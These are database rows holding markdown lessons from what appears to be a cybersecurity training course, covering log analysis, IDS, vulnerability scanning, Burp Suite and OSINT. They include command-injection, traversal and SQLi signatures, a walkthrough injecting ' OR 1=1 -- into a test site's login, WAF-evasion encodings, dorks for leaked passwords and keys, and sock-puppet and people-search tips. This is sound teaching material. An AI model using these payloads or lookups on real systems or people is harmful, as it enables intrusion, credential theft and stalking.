(449, 50, '## Who am I?\n\nEnumerating the host you are on.\n\n### Commands\n1.  `hostname`: Computer Name.\n2.  `whoami`: Current user (`DOMAINUser`).\n    *   `whoami /priv`: Show my privileges (Look for *SeDebugPrivilege*).\n    *   `whoami /groups`: Show my groups (Look for *Administrators*).\n3.  `systeminfo`: Huge dump of OS version, Hotfixes (Patches), and Domain.\n    *   *Hack*: `systeminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"`', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(450, 51, '## Network Configuration\n\n### Ipconfig\n*   `ipconfig`: IP, Subnet Mask, Gateway.\n*   `ipconfig /all`: + MAC Address, DNS Servers, DHCP info.\n*   `ipconfig /release` & `ipconfig /renew`: Refresh DHCP.\n*   `ipconfig /flushdns`: Clear DNS cache.\n\n### Ping & Tracert\n*   `ping google.com`: Test connectivity. (Uses ICMP).\n*   `tracert google.com`: Trace the hops to the destination. (Shows which routers you pass through).\n\n### Netstat\nNetwork Statistics.\n*   `netstat -an`: Show all open ports and connections.\n*   `netstat -ano`: Show PIDs (So you can kill the process using the port).', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(451, 52, '## Tasklist & Taskkill\n\nManaging processes from CLI.\n\n### Tasklist\n*   `tasklist`: Lists all running processes and PIDs.\n*   `tasklist /svc`: Shows which **Service** creates the process. (Great for `svchost.exe`).\n*   `tasklist /m`: Lists DLLs used by each process.\n\n### Taskkill\n*   `taskkill /PID 1234`: Kill by ID.\n*   `taskkill /IM notepad.exe`: Kill by Image Name.\n*   `taskkill /F /IM notepad.exe`: **Force** kill. (Like `kill -9`).', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(460, 54, '## Anatomy of a Log: Reading the Matrix\n\nA log is just a text record of \"Software doing something\".\n\n### The 3 Pillars of Observability\n1.  **Logs**: Discrete events (The error happened at 2:01 PM).\n2.  **Metrics**: Aggregated numbers (CPU usage was 80%).\n3.  **Traces**: The journey of a request across services.\n\n### Common Log Formats\n*   **Syslog (The Standard)**: `Dec 29 10:00:00 hostname sshd[1234]: Failed password for root from 1.2.3.4`.\n*   **JSON (The Modern)**: `{\"timestamp\": \"2025-12-29T10:00:00\", \"host\": \"web01\", \"level\": \"ERROR\"}`.\n*   **CEF (Common Event Format)**: Used by ArcSight. `CEF:0|Vendor|Product|Version|ID|Name|Sev|Extension`.\n\n### Why Analysts Hate Unstructured Logs\nIf a developer logs: `Error: Something bad happened.`\n*   It tells you **nothing**.\n*   A good log answers: **Who? What? Where? When?**\n\n### The Timestamp Problem\n*   **Timezones**: Is the log in UTC or EST? If you correlate a UTC firewall log with an EST server log, you will be 5 hours off, and you will miss the attack.\n*   **Rule**: Always set servers to UTC.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 16:31:02'),
(461, 55, '## SSH Authentication Logs\n\nThe most attacked service on the internet.\n\n### /var/log/auth.log (or secure)\nIf you open a Linux server to the internet on Port 22, you will see this 5 seconds later:\n\n*   **Failed Password**:\n    `Invalid user admin from 192.168.1.5`\n    `Failed password for invalid user admin from 192.168.1.5 port 22 ssh2`\n    *   This is a Dictionary Attack (Brute Force).\n\n*   **Successful Login**:\n    `Accepted password for root from 192.168.1.5 port 22 ssh2`\n    `pam_unix(sshd:session): session opened for user root`\n    *   **Alert**: If you see this from a strange IP -> **Immediate Incident**.\n\n### Public Key Auth (The Secure Way)\n`Accepted publickey for root from 1.2.3.4...`\n*   This means they used an SSH Key file (`id_rsa`), not a password.\n*   It is much harder to brute force.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 16:31:03'),
(462, 56, '## Web Access Logs (Apache/Nginx)\n\nFormat: `IP - User - Date - \"Request\" - Status - Bytes - Referrer - UserAgent`\n\n### Status Codes\n*   **200 OK**: Request succeeded. (The page loaded).\n*   **301/302 Redirection**: Moved.\n*   **404 Not Found**: Client requested junk.\n    *   *Security Note*: High volume of 404s suggests a **Fuzzing/Dirbusting** attack (Looking for hidden files).\n*   **403 Forbidden**: Access Denied.\n*   **500 Internal Server Error**: The server crashed.\n    *   *Security Note*: A 500 often means an Exploit (SQLi or RCE) broke the application logic. Investigate 500s!', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(463, 57, '## Windows Logs (Security)\n\nFocus on **Event ID 4624 (Logon Success)** and **4625 (Failure)**.\n\n### Logon Types\nThe key field in Event 4624.\n*   **Type 2**: Interactive. (Someone sat at the keyboard).\n*   **Type 3**: Network. (Someone accessed a Shared Folder or mapped a drive).\n    *   *Note*: Psexec uses Type 3.\n*   **Type 10**: RemoteDesktop. (RDP).\n    *   *Note*: The source IP is logged here. Crucial for tracking RDP attacks.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(464, 58, '## Detecting Web Attacks via Logs\n\n### SQL Injection (SQLi)\nLook for SQL syntax in the URL/URI.\n*   `UNION SELECT`\n*   `OR 1=1`\n*   `%27` (Single Quote encoded).\n\n### Cross Site Scripting (XSS)\nLook for HTML/JS tags.\n*   `<script>`\n*   `alert(1)`\n*   `%3Cscript%3E`\n\n### Directory Traversal\nTrying to escape the web root.\n*   `../../../../etc/passwd`\n*   `..%2F..%2F` (Encoded).', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(465, 59, '## Firewall Logs\n\nUsually very simple but high volume.\n*   `ALLOW TCP 192.168.1.5:54332 -> 8.8.8.8:53`\n*   `DENY TCP 1.2.3.4:445 -> 192.168.1.1:445`\n\n### Indicators\n1.  **Outbound DENY**: Internal host trying to reach a blocked service (e.g., Malware trying to connect to C2 on port 6667 IRC).\n2.  **Internal Scanning**: One internal IP connecting to 445 on ALL other IPs. (Lateral Movement / Worm).\n3.  **Beaconing**: Regular connections to the same external IP every 60 seconds. (C2 Heartbeat).', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(466, 60, '## Detecting Command Injection\n\nWhen input meant for a form is passed to a System Shell.\n\n### Signatures\n*   `; cat /etc/passwd` (The semicolon chains commands).\n*   `| whoami`\n*   `$(reboot)`\n*   `&& ping 1.1.1.1`\n\n### Review\nIf you see these characters `; | $ &` in a Username or Search field in your logs, you are being attacked.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(467, 61, '## Advanced Obfuscation\n\nAttackers hide their payloads to bypass WAFs (Web Application Firewalls).\n\n### Techniques\n1.  **URL Encoding**: `select` -> `%73%65%6C%65%63%74`.\n2.  **Double URL Encoding**: `%252E` (Encodes the % sign).\n3.  **Case Variation**: `SeLeCt * FrOm`.\n4.  **Whitespace**: `SELECT/**/Password/**/FROM` (SQL ignores comments, WAF might get confused).\n\n### De-obfuscation\nThe Analyst\'s job is to decode the string back to plaintext to understand the intent via tools like CyberChef.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(468, 72, '## Web Proxies\n\nA Proxy sits between You (Client) and the Internet (Server).\n*   **Forward Proxy**: Protects the Client. (e.g., Corporate specific proxy filtering Facebook).\n*   **Reverse Proxy**: Protects the Server. (e.g., Cloudflare sits in front of a website to stop DDOS).\n\n### The Attacker\'s Proxy (Intercepting Proxy)\nTools like **Burp Suite** or **OWASP ZAP**.\nThey allow you to \"freeze\" time.\n1.  You click \"Login\" on a website.\n2.  The browser sends the POST request.\n3.  The Proxy CATCHES it before it goes to the server.\n4.  You edit the request (change `price=100` to `price=0`).\n5.  You forward it.\n6.  The server processes the modified request.', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(469, 73, '## Burp Suite\n\nThe de-facto standard for Web App Hacking.\n\n### Key Components\n1.  **Dashboard**: Status checks.\n2.  **Proxy**: The Interceptor.\n    *   **Intercept is On**: Traffic stops until you click Forward.\n    *   **HTTP History**: A log of every request sent.\n3.  **Repeater**: Manual Testing. (Send -> Modify -> Resend).\n4.  **Intruder**: Brute forcing. (Send -> fuzz payload -> Resend 1000 times).\n5.  **Decoder**: Base64/URL encoding tool.\n\n### Setup\nBurp listens on `127.0.0.1:8080`.\nYou must configure your browser (Firefox) to send traffic there, or use Burp\'s built-in Chromium browser.', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(470, 74, '## Hands On: Intercepting\n\n### Step-by-Step\n1.  Open Burp. Go to Proxy -> Intercept. Turn it **ON**.\n2.  Open Browser. Go to `http://testphp.vulnweb.com/login.php`.\n3.  Type `admin` / `admin` and hit Enter.\n4.  Browser hangs (it is waiting).\n5.  Look at Burp. You see the raw HTTP request:\n    ```http\n    POST /userinfo.php HTTP/1.1\n    Host: testphp.vulnweb.com\n    uname=admin&pass=admin\n    ```\n6.  Change `uname=admin` to `uname=\' OR 1=1 --`.\n7.  Click **Forward**.\n8.  Check Browser. You are logged in! (SQL Injection).', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(471, 75, '## The Repeater\n\nThe most used tab in Burp.\nInstead of going back to the browser, re-typing the password, and hitting submit... just send the request to **Repeater**.\n\n### Workflow\n1.  Right click a request in Proxy History -> **Send to Repeater** (Ctrl+R).\n2.  Go to Repeater Tab.\n3.  Change one character.\n4.  Click **Send**.\n5.  Look at the Response on the right.\n6.  Repeat.\n\n### Decoder\nHackers use encoding to bypass filters.\n*   **Base64**: `admin` -> `YWRtaW4=`.\n*   **URL**: `SELECT *` -> `SELECT%20%2A`.\n*   Decoder helps you decode cookie values to see if they are readable.', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(472, 76, '## Proxy Chaining (Anonymity)\n\nSometimes you need to hide where you are coming from.\n\n### TOR (The Onion Router)\n*   Routes traffic through 3 nodes (Entry -> Middle -> Exit).\n*   **Proxychains**: A Linux tool that forces *any* program to go through TOR.\n    *   `proxychains nmap -sT target.com`\n    *   Output: `DNS-request ... S-chain ... OK`\n\n### VPN vs Proxy\n*   **VPN**: Encrypts ALL traffic from your PC (OS level).\n*   **Proxy**: Encrypts/Routes traffic only for that specific App (Browser level).', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(517, 77, '## IDS vs IPS: Architecture & Strategy\n\n**IDS (Intrusion Detection System)**: The Security Camera. It watches and alerts (Passive).\n**IPS (Intrusion Prevention System)**: The Bouncer. It watches and BLOCKS (Active).\n\n### Architecture Deployment\n*   **Out-of-Band (IDS)**:\n    *   Connected via a TAP or SPAN Port (Mirror).\n    *   It sees a *copy* of the traffic.\n    *   *Pro*: If the IDS crashes, network traffic continues (Fail-Open).\n    *   *Con*: It cannot stop a single packet, it can only send a \"Reset\" (TCP RST) packet to try and kill the connection, which often fails against fast attacks.\n*   **In-Line (IPS)**:\n    *   Sit directly in the wire (Cable A -> IPS -> Cable B).\n    *   *Pro*: Can drop packets instantly. 100% prevention.\n    *   *Con*: If the IPS crashes or gets overloaded, the internet goes down for the whole company (Fail-Closed).\n\n### Which one to use?\n*   **Core Core**: Usually IDS. You don\'t want to risk blocking the CEO\'s email.\n*   **Edge**: IPS (Firewall). Block known bad stuff aggressively.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:52'),
(518, 78, '## Detection Methodologies\n\nHow does the box know it\'s an attack?\n\n### 1. Signature-Based (The Anti-Virus Model)\n*   **Concept**: Pattern Matching.\n*   **Example**: \"If packet contains `0x909090` (NOP Sled) AND `cmd.exe` -> ALERT.\"\n*   **Pros**: Fast, Low False Positives.\n*   **Cons**: Blind to Zero-Days. If the attacker changes 1 byte of the payload, the signature fails. (e.g., `cmD.eXe`).\n\n### 2. Anomaly-Based (Behavioral)\n*   **Concept**: \"This looks weird.\"\n*   **Baseline**: The system learns \"Normal\". (e.g., \"Web Server usually speaks HTTP on port 80\").\n*   **Alert**: \"Web Server is speaking IRC on port 6667.\" -> ALERT.\n*   **Pros**: Catches Zero-Days.\n*   **Cons**: High False Positives. (Did the backup job start at a weird time? ALERT).\n\n### 3. Protocol Analysis (Stateful)\n*   **Concept**: Rules of the Road.\n*   **Example**: \"In TCP, after SYN, next must be SYN-ACK.\"\n*   **Alert**: \"Client sent ACK without SYN.\" -> ALERT (Malformed Packet / Scan).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(519, 79, '## Network (NIDS) vs Host (HIDS)\n\nYou need both.\n\n### NIDS (Suricata, Snort, Zeek)\n*   **View**: The Network Wire.\n*   **Blindspot**: **Encryption (TLS/SSL)**.\n    *   If the attacker uses HTTPS, the NIDS sees garbage ciphertext. It cannot detect the SQL Injection inside the SSL tunnel (unless you use SSL Termination).\n\n### HIDS (Wazuh, OSSEC, CrowdStrike)\n*   **View**: The Endpoint (OS).\n*   **Advantage**: It sees the data *after* decryption.\n*   **Advantage 2**: It sees local files and logs.\n*   **Example**: NIDS sees encrypted traffic. HIDS sees `cmd.exe` being spawned by IIS. HIDS wins here.\n\n### Deployment Strategy\n1.  **NIDS** at the gateway to filter massive noise.\n2.  **HIDS** on every server to catch what slips through.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(520, 81, '## Zeek (Bro) Surveillance\n\n**Zeek** is not a traditional IDS. It is a \"Network Flight Recorder\".\nIt doesn\'t just look for attacks; it logs **everything** in structured metadata.\n\n### The Power of Zeek\nInstead of a binary \"Match/No Match\", Zeek creates logs:\n*   `conn.log`: Every single TCP/UDP connection. (Duration, Bytes, Service).\n*   `http.log`: Every URL, User-Agent, Referrer.\n*   `dns.log`: Every DNS query.\n*   `ssl.log`: Every Certificate seen.\n\n### Forensics Use Case\n*   **Alert**: \"Malware detected on PC-5.\"\n*   **Question**: \"Has PC-5 talked to this C2 server before today?\"\n*   **Snort**: \"I don\'t know, there was no signature.\"\n*   **Zeek**: \"Yes. Checking `dns.log`... PC-5 queried `evil.com` 4 days ago. Checking `conn.log`... data was transferred.\"\n\n### Threat Hunting\n\"Show me all SSL Certificates where the Issuer is \'Let\'s Encrypt\' but the domain is a Bank.\" (Phishing).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(521, 82, '## Alert Triage & Investigation\n\nThe core loop of the SOC Analyst.\n\n### 1. Validation (True or False?)\n*   **Alert**: \"SQL Injection Detected from 1.2.3.4\".\n*   **Check**: Look at the HTTP Response Code.\n    *   if **200 OK**: The server accepted it. **True Positive**. (BAD).\n    *   if **500 Error**: The server crashed. **True Positive**. (BAD).\n    *   if **403 Forbidden**: The WAF blocked it. **True Positive (Blocked)**. (Good).\n    *   if **404 Not Found**: Scanner. **True Positive (Attempt)**.\n\n### 2. Context\n*   **Source IP**: Is it internal or external? Is it a known scanner (Shodan)?\n*   **Dest IP**: Is it a Critical Server or a Test Box?\n\n### 3. Investigation\n*   Checking other logs. \"Did the endpoint spawn a shell right after this?\"\n\n### 4. Categorization\n*   **True Positive**: Real Attack.\n*   **False Positive**: Normal traffic flagged as bad. (e.g., Admin running a backup script looks like data exfil).\n*   **False Negative**: Attack happened, but NO alert fired. (The worst case).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(522, 83, '## Handling False Positives\n\nTuning is the job of the Security Engineer.\n\n### Common Causes\n1.  **Vulnerability Scanners**: Nessus scans look like attacks. Whitelist the scanner IP.\n2.  **Poorly written rules**: A rule checking for \"files containing 00\" triggers on binary downloads.\n3.  **Updates/Software**: A new legit app behaves weirdly.\n\n### Tuning\n*   **Disable**: Turn off the rule entirely (Risky).\n*   **Suppress**: \"Don\'t alert on this rule for Source IP 1.2.3.4\". (Better).\n*   **Rewrite**: Make the rule more specific.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:05:38'),
(523, 84, '## The Vulnerability Lifecycle\n\nVulnerability Management (VM) is not just \"Scanning\". It is a process.\n\n### 1. Discovery\n*   Asset Inventory. You can\'t scan what you don\'t know exists.\n*   \"We found a rogue Raspberry Pi on the network.\"\n\n### 2. Prioritization\n*   Scanner says: \"Critical Bug on Server A (Test) and Server B (Production)\".\n*   **Context**: Server B exposes patient data. Server A is empty. Fix B first.\n\n### 3. Remediation\n*   **Patch**: Install the update.\n*   **Mitigate**: Cannot patch (Legacy App)? Add a Firewall rule (Virtual Patch).\n*   **Accept**: \"The risk is low, fixing it costs $1M. We accept the risk.\" (Must be signed by Exec).\n\n### 4. Verification\n*   Re-scan. \"Did the patch actually work?\"\n\n### The Time Gap\n**Window of Exposure**: The time between the bug discovery (Day 0) and the Patch applied (Day 30).\nYour goal is to shrink this window.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(524, 85, '## Authenticated vs Unauthenticated Scanning\n\n### Unauthenticated Scan (The Hacker\'s View)\n*   The scanner sends packets to ports (80, 443).\n*   It grabs banners: \"Apache 2.4.49\".\n*   It checks the Banner version against a CVE list.\n*   *Prob*: It misses everything inside the OS. Browsers, Adobe Reader, Kernel versions.\n*   *Result*: High False Positives (Backported patches look old).\n\n### Authenticated Scan (The Auditor\'s View)\n*   You give the scanner credentials (SSH specific user, or Windows Admin).\n*   The scanner logs in.\n*   It runs `rpm -qa` or looks at the Registry.\n*   \"I see Chrome version 80 installed.\"\n*   *Result*: Extremely accurate. This is the Gold Standard for corporate VM.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(525, 86, '## Decoding CVSS Scores\n\n**Common Vulnerability Scoring System (CVSS)** looks objective, but requires interpretation.\n\n### The Metrics (CVSS v3.1)\n*   **AV (Attack Vector)**: Network (N), Adjacent (A), Local (L), Physical (P).\n    *   *Network* is worst (Remote).\n*   **AC (Attack Complexity)**: Low (L) vs High (H).\n    *   *Low* means a script kiddie can do it.\n*   **PR (Privileges Required)**: None (N), Low (L), High (H).\n    *   *None* is worst (Unauth RCE).\n*   **UI (User Interaction)**: None (N) vs Required (R).\n    *   *Required* means user must click a link (Phishing).\n*   **S (Scope)**: Unchanged (U) vs Changed (C).\n    *   *Changed* means breaking out of the sandbox (VM Escape).\n*   **CIA**: Confidentiality, Integrity, Availability.\n\n### Example: Log4J\n**CVSS: 10.0** (Critical)\n`AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`\n*   Network Access.\n*   Low Complexity.\n*   No Privs.\n*   No User Click.\n*   Total compromise.\n*   **This is why it set the internet on fire.**', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(526, 87, '## Nessus Essentials\n\nThe world\'s most popular scanner.\n\n### Setup\n1.  Download Nessus Essentials (Free for 16 IPs).\n2.  Install (Web Interface on port 8834).\n3.  New Scan -> \"Basic Network Scan\".\n4.  Target: `192.168.1.0/24`.\n\n### Plugins\nNessus uses plugins (scripts written in NASL) to check for specific bugs.\n*   plugin #11011 (SMB Signing).\n*   plugin #33850 (Unsupported Unix OS).\nThere are 180,000+ plugins.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(527, 88, '## Analyzing Scan Reports\n\nScanners (Nessus, Qualys) generate 500-page PDF reports. Nobody reads them.\nYour job is to filter.\n\n### False Positives\n*   **Backporting**: Linux distros (RedHat) fix bugs but keep the version number same.\n    *   Scanner sees \"Apache 2.4.6\". Says \"Vulnerable to CVE-2019...\".\n    *   Reality: It is `Apache 2.4.6-97.el7`. The fix is applied.\n    *   *Action*: Verify using package manager (`yum info httpd`).\n\n### Supersedence\n*   Patch A fixes Bug 1.\n*   Patch B fixes Bug 1 and Bug 2.\n*   Report: Lists both.\n*   *Action*: Just install Patch B.\n\n### Focus on Exploitable\n*   A \"Critical\" bug with **No Exploit Available** is less dangerous than a \"High\" bug with a **Metasploit Module** available right now.\n*   Use Threat Intel to tag \"Exploited in the Wild\".', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(528, 89, '## Patch Management\n\nThe most effective security control.\n\n### The Patch Tuesday Cycle\nMicrosoft releases patches on the 2nd Tuesday of every month.\n1.  **Tuesday**: Patches released.\n2.  **Wednesday**: Testing in \"Dev\" environment. (Does the patch break the App?).\n3.  **Thursday**: Deploy to \"Pilot\" group (10% of users).\n4.  **Friday**: Deploy to everyone.\n\n### Legacy Systems\nWhat if you CAN\'T patch? (e.g., MRI machine running Windows XP).\n**Mitigating Controls**:\n*   **Air Gap**: Disconnect from internet.\n*   **VLAN**: Segregate it so it can only talk to the Printer.\n*   **IPS**: Virtual Patching (Block the exploit at the network level).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(529, 90, '## CVE (Common Vulnerabilities and Exposures)\n\nThe Dictionary. Managed by MITRE.\n\n### Format: CVE-YEAR-NUMBER\n*   `CVE-2017-0144` (EternalBlue).\n*   **Year**: When it was assigned (not necessarily disclosed).\n*   **Number**: Unique ID.\n\n### NVD (National Vulnerability Database)\nThe US Government database that adds context (CVSS score) to the CVE.\n*   Process: Researcher finds bug -> Requests CVE -> MITRE assigns ID -> Researcher publishes details -> NVD scores it.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(530, 91, '## Risk Response Strategies\n\nYou found a Critical Vuln. What now?\n\n1.  **Mitigate (Remediate)**: Fix it. (Apply Patch). Preferred.\n2.  **Accept**: \"We know it risky, but we need Windows XP for this old robot arm. We accept the risk.\" (Must be signed by Exec).\n3.  **Transfer**: Buy Insurance. \"If we get hacked, Insurance pays.\"\n4.  **Avoid**: Turn off the functionality. \"Disable SMBv1\".', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(531, 92, '## DAST (Dynamic Application Security Testing)\n\nTesting the running application from the outside (Black Box).\n*   **Tool**: OWASP ZAP, Burp Suite Pro, Acunetix.\n*   **Method**: Fuzzing. Throwing garbage at the app to see if it breaks.\n\n### SAST vs DAST\n*   **SAST (Static)**: Scans the Source Code (White Box). \"You have a variable that isn\'t sanitized on line 40.\"\n*   **DAST (Dynamic)**: Scans the URL. \"I sent \' OR 1=1 and got a database error.\"', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(532, 93, '## OWASP Top 10\n\nThe Ten Commandments of Web Security. Updated every few years (2021 is current).\n\n1.  **Broken Access Control**: User A can see User B\'s data.\n2.  **Cryptographic Failures**: Storing passwords in cleartext.\n3.  **Injection**: SQLi, Command Injection.\n4.  **Insecure Design**: Logic flaws.\n5.  **Security Misconfiguration**: Default passwords, Verbose error messages.\n6.  **Vulnerable Components**: Using an old jQuery library with known bugs.\n...\n(Memorize the top 3 at least!)', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(533, 94, '## OWASP ZAP (Zed Attack Proxy)\n\nThe \"Free Burp Suite\". Open Source.\n\n### Quick Start\n1.  **Automated Scan**: Type URL, click Attack.\n    *   Spider crawls the site.\n    *   Active Scanner attacks inputs.\n2.  **HUD**: ZAP injects a toolbar into your browser so you can hack while you surf.\n\n### Use Case\nGreat for CI/CD pipelines. You can automate ZAP to scan your website every night.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(534, 95, '## Spidering (Crawling)\n\nMapping the Application.\nThe scanner follows every link (`<a href=...>`) to find all pages.\n\n### Challenges\n1.  **Login Forms**: The spider hits the login page and stops. You must configure Auth.\n2.  **Infinite Loops**: Calibration calendar (Next Month -> Next Month -> ...). The spider gets stuck forever.\n3.  **Destructive Actions**: If the spider clicks \"Delete Account\", it deletes the account.\n    *   **Pro Tip**: Never scan Production with a privileged account unless you have backups.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(535, 96, '## Active Scanning Mechanics\n\nHow does the bot hack?\nIt uses **Payload Lists**.\n\n### Example: SQL Injection Check\n1.  Finds input `id=5`.\n2.  Sends `id=5\'`. Checks for \"Syntax Error\".\n3.  Sends `id=5 AND 1=1`. Checks if page loads.\n4.  Sends `id=5 AND 1=2`. Checks if page disappears.\nIf 3 works and 4 fails -> **Vulnerable**.\n\nThis creates thousands of requests. Do not run this on fragile legacy servers.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(536, 97, '## DAST False Positives\n\nDAST is noisy.\n*   **The \"Error Page\" Fallacy**: The scanner sees the word \"SQL\" on a page (e.g., in a blog post about SQL) and thinks it caused an error.\n*   **Timeout**: The scanner slowed down the server, causing 500 errors, which it interprets as vulnerabilities.\n\n**Verification**: always reproduce the finding manually with Burp Repeater.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(537, 98, '## Writing the Report\n\n Developers hate generic reports.\n\"Fix Cross Site Scripting\" - HOW? WHERE?\n\n### The Perfect Bug Report\n1.  **Title**: Reflected XSS on Search Page.\n2.  **Location**: `GET /search.php?q=PAYLOAD`\n3.  **Evidence**: Screenshot of the `alert(1)` box.\n4.  **Impact**: \"Attacker can steal session cookies.\"\n5.  **Fix**: \"Sanitize input using `htmlspecialchars()` function in PHP.\"', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(538, 160, '# Module 16 Final Quiz\n\nThis final test evaluates your understanding of the **Vulnerability Management** module.\n\n## Instructions\n*   This quiz contains **20 Questions**.\n*   It covers all topics: Lifecycle, Authentication, CVSS, Nessus, Reporting, Patching, CVEs, and Risk.\n*   There is no time limit, but try to answer without looking up the answers.\n\n## Key Concepts Reviewed\n*   **Lifecycle**: Discovery -> Assessment -> Prioritization -> Remediation -> Verification.\n*   **CVSS**: Base metrics (AV, AC, PR, UI, S, C, I, A).\n*   **Scans**: Auth vs Unauth, Internal vs External.\n*   **Reports**: Filter by Severity and Exploitability.\n*   **Remediation**: Patches, Workarounds, and Risk Acceptance.\n\nGood Luck!', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-26 22:11:01'),
(539, 181, '## What is OSINT?\n\n**Open Source Intelligence** is the art of finding information that is publicly available but hidden in plain sight.\n\n### The Scope\n*   **Public**: It must be accessible without hacking.\n*   **Legal**: You are not breaking into servers. You are reading what they posted.\n\n### Passive vs Active\n*   **Passive Recon**: You never touch the target\'s servers.\n    *   Looking at Archive.org, LinkedIn, Whois.\n    *   *Risk*: Zero. The target doesn\'t know you exist.\n*   **Active Recon**: You touch the target.\n    *   Port Scanning (Nmap), Banner Grabbing.\n    *   *Risk*: High. The firewall logs your IP.\n\n### The \"Grey Man\" Concept\nAn OSINT analyst must be invisible.\n*   Do not like posts on LinkedIn with your real account.\n*   Do not visit the target website from your corporate VPN.\n*   Use a \"Sock Puppet\" (Fake Persona).', 'markdown', 15, '2025-12-26 22:15:15', '2025-12-29 16:32:38'),
(540, 182, '## The Intelligence Cycle\n\nHow to turn \"Data\" into \"Intelligence\".\n\n1.  **Planning (Requirements)**: \"Does this company have a presence in China?\"\n2.  **Collection**: Running tools.\n    *   \"Found 500 IPs.\"\n    *   \"Found 50 employees on LinkedIn.\"\n    *   This is just noise (Raw Data).\n3.  **Processing**: Filtering.\n    *   \"Remove the 400 IPs that are Cloudflare.\" (Useless).\n    *   \"Translate the Chinese profiles to English.\"\n4.  **Analysis**: The \"So What?\".\n    *   \"Employee X posted a photo of the server room password on Instagram.\"\n    *   *Conclusion*: They have weak physical security policies.\n5.  **Dissemination**: The Report.\n    *   \"To: CISO. From: Intel Team. Subject: Credential Leak.\"\n6.  **Feedback**: \"Was this helpful?\"', 'markdown', 15, '2025-12-26 22:15:15', '2025-12-29 16:32:38'),
(541, 183, '## OPSEC & Sock Puppets\n\n**Operational Security (OPSEC)** is protecting *yourself* while you hunt.\n\n### The Sock Puppet (Fake Account)\n*   **Name**: Create a fake name (Use a generator).\n*   **Photo**: Do NOT use ThisPersonDoesNotExist.com (AI artifacts are easy to spot). Use a generic photo (e.g., a car, a landscape) or a heavily modified real photo.\n*   **History**: An account created today with 0 friends is suspicious.\n    *   \"Age\" the account. Post random stuff for a month before using it.\n    *   Add random people (Recruiters accepted everyone).\n\n### Technical OPSEC\n*   **Browser**: Use a separate browser profile.\n*   **VPN**: Always on. Use a commercial VPN (Proton, Mullvad).\n*   **VM**: Use a disposable Virtual Machine. If you download malware by accident, just delete the VM.\n*   **Burner Phones**: For 2FA verification (Google Voice, textverified.com).', 'markdown', 15, '2025-12-26 22:15:15', '2025-12-29 16:32:38'),
(542, 184, '## Google Dorking Mastery\n\nGoogle is a hacking tool.\n\n### Operators\n*   `site:` Search only this domain. (`site:target.com`)\n*   `filetype:` Search file extensions. (`filetype:pdf`)\n*   `inurl:` Search the URL bar. (`inurl:admin`)\n*   `intitle:` Search the page title. (`intitle:\"index of\"`)\n\n### The \"Juicy\" Dorks\n1.  **Finding Passwords**:\n    `site:pastebin.com \"password\" \"target.com\"`\n2.  **Finding Config Files**:\n    `site:target.com filetype:env` (Looking for .env files with AWS keys).\n3.  **Finding Admin Panels**:\n    `site:target.com inurl:login`\n4.  **Finding Directory Listings**:\n    `intitle:\"index of\" \"backup\"`\n\n### Google Hacking Database (GHDB)\nA repository of thousands of pre-made dorks maintained by Exploit-DB.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 16:32:38'),
(543, 185, '## People Reconnaissance\n\nFinding a person.\n\n### The Username correlation\nMost people use the same username everywhere.\n*   `namechk.com`: Check if `supercoder99` is taken on Instagram, Github, TikTok.\n*   If they use the same avatar on multiple sites, that is a strong confirmation.\n\n### Real Estate & Voter Records\nIn the US, voter records and property deeds are public.\n*   Sites like `TruePeopleSearch` or `FamilyTreeNow` aggregate this.\n*   You can find Home Addresses, Phone Numbers, and Relatives for free.\n*   **Defensive Note**: You should opt-out of these sites to protect yourself.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
